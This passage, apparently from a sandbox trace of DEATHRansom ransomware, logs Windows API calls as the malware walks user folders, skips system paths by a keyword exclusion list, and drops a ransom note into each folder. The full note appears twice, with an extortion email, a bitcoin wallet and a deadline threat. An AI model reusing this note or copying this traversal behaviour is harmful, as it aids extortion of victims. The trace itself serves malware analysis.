CloseHandle (hObject=0x79c) returned 1 [0076.137] GetProcessHeap () returned 0x4f10000 [0076.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c90050 | out: hHeap=0x4f10000) returned 1 [0076.137] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0076.138] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites") returned 30 [0076.138] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0076.138] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0076.138] StrStrW (lpFirst="favorites", lpSrch="programdata") returned 0x0 [0076.138] StrStrW (lpFirst="favorites", lpSrch="$recycle.bin") returned 0x0 [0076.138] StrStrW (lpFirst="favorites", lpSrch="program files") returned 0x0 [0076.138] StrStrW (lpFirst="favorites", lpSrch="windows") returned 0x0 [0076.138] StrStrW (lpFirst="favorites", lpSrch="all users") returned 0x0 [0076.138] StrStrW (lpFirst="favorites", lpSrch="appdata") returned 0x0 [0076.138] GetProcessHeap () returned 0x4f10000 [0076.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c90050 [0076.138] lstrcpyW (in: lpString1=0x8c90050, lpString2="\\\\?\\C:\\Users\\Default\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites") returned="\\\\?\\C:\\Users\\Default\\Favorites" [0076.138] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 104 [0076.138] QueueUserWorkItem (Function=0x40a710, Context=0x8c90050, Flags=0x0) returned 1 [0076.138] GetProcessHeap () returned 0x4f10000 [0076.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.138] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\*") returned 32 [0076.138] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.142] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\.") returned 32 [0076.142] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.143] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.143] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.143] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\..") returned 33 [0076.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.143] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.143] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0076.143] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Links", cAlternateFileName="")) returned 1 [0076.143] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned 36 [0076.143] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0076.143] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0076.143] StrStrW (lpFirst="links", lpSrch="programdata") returned 0x0 [0076.143] StrStrW (lpFirst="links", lpSrch="$recycle.bin") returned 0x0 [0076.143] StrStrW (lpFirst="links", lpSrch="program files") returned 0x0 [0076.143] StrStrW (lpFirst="links", lpSrch="windows") returned 0x0 [0076.143] StrStrW (lpFirst="links", lpSrch="all users") returned 0x0 [0076.143] StrStrW (lpFirst="links", lpSrch="appdata") returned 0x0 [0076.143] GetProcessHeap () returned 0x4f10000 [0076.143] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b400a8 [0076.143] lstrcpyW (in: lpString1=0x8b400a8, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links" [0076.143] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 105 [0076.143] QueueUserWorkItem (Function=0x40a710, Context=0x8b400a8, Flags=0x0) returned 1 [0076.143] GetProcessHeap () returned 0x4f10000 [0076.143] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b500b0 [0076.144] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*") returned 38 [0076.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0076.144] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\.") returned 38 [0076.144] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.144] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.144] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.144] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\..") returned 39 [0076.144] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.144] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfefb1330, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.144] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0076.144] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb11062, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0076.144] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0076.144] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb11062, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0076.144] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0076.144] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\read_me.txt") returned 48 [0076.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\read_me.txt" (normalized: "c:\\users\\default\\favorites\\links\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x924 [0076.148] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.148] WriteFile (in: hFile=0x924, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.149] CloseHandle (hObject=0x924) returned 1 [0076.149] GetProcessHeap () returned 0x4f10000 [0076.149] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b500b0 | out: hHeap=0x4f10000) returned 1 [0076.149] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0076.149] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned 49 [0076.149] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0076.149] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0076.149] StrStrW (lpFirst="microsoft websites", lpSrch="programdata") returned 0x0 [0076.149] StrStrW (lpFirst="microsoft websites", lpSrch="$recycle.bin") returned 0x0 [0076.150] StrStrW (lpFirst="microsoft websites", lpSrch="program files") returned 0x0 [0076.150] StrStrW (lpFirst="microsoft websites", lpSrch="windows") returned 0x0 [0076.150] StrStrW (lpFirst="microsoft websites", lpSrch="all users") returned 0x0 [0076.150] StrStrW (lpFirst="microsoft websites", lpSrch="appdata") returned 0x0 [0076.150] GetProcessHeap () returned 0x4f10000 [0076.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b500b0 [0076.150] lstrcpyW (in: lpString1=0x8b500b0, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites" [0076.150] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 106 [0076.150] QueueUserWorkItem (Function=0x40a710, Context=0x8b500b0, Flags=0x0) returned 1 [0076.150] GetProcessHeap () returned 0x4f10000 [0076.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b700c0 [0076.150] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*") returned 51 [0076.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0076.161] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\.") returned 51 [0076.161] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.161] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.161] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.161] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\..") returned 52 [0076.161] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.161] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0076.161] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0076.161] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0076.161] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0076.161] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0076.161] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0076.161] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0076.161] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0076.161] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0076.161] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0076.161] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0076.161] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0076.162] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\read_me.txt") returned 61 [0076.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\read_me.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x930 [0076.163] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.163] WriteFile (in: hFile=0x930, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.164] CloseHandle (hObject=0x930) returned 1 [0076.164] GetProcessHeap () returned 0x4f10000 [0076.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b700c0 | out: hHeap=0x4f10000) returned 1 [0076.164] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0076.164] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned 43 [0076.164] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0076.164] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0076.164] StrStrW (lpFirst="msn websites", lpSrch="programdata") returned 0x0 [0076.164] StrStrW (lpFirst="msn websites", lpSrch="$recycle.bin") returned 0x0 [0076.164] StrStrW (lpFirst="msn 